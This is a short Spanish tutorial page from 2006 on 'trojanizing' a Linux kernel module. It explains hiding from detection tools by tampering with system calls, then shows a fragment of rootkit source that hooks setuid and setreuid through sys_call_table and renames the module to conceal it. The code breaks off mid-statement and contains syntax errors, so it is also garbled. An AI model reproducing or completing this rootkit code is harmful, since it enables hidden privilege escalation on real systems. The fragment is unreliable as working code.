Troyanizar un Módulo en Linux
(1 capítulos)
    (0)
|
| Uno de los métodos mas difíciles de detectar consiste en manipular el núcleo del sistema, así podremos pasar completamente "invisibles" ante cualquier herramienta de detección porque modificaríamos la información que proporcionan las llamadas al sistema en el que se basan todo los UNIX. |
| Cap 1 |
Troyanizar un Modulo en Linux
|
| |
setuid() y setreuid() kon este modulo .int new_setuid(uid_t); ---int (*real_setuid) (uid_t); ---extern void *sys_call_table [];int init_module () { ---register struct module *mp asm ('%ebx'; ---*(char *) (mp->name) = 'd'; *(char *) (mp->name+1) = 's'; ---*(char *) (mp->name+2) = '2'; *(char |
|
|
Autor: Indaya.com - 22 de Febrero de 2006
|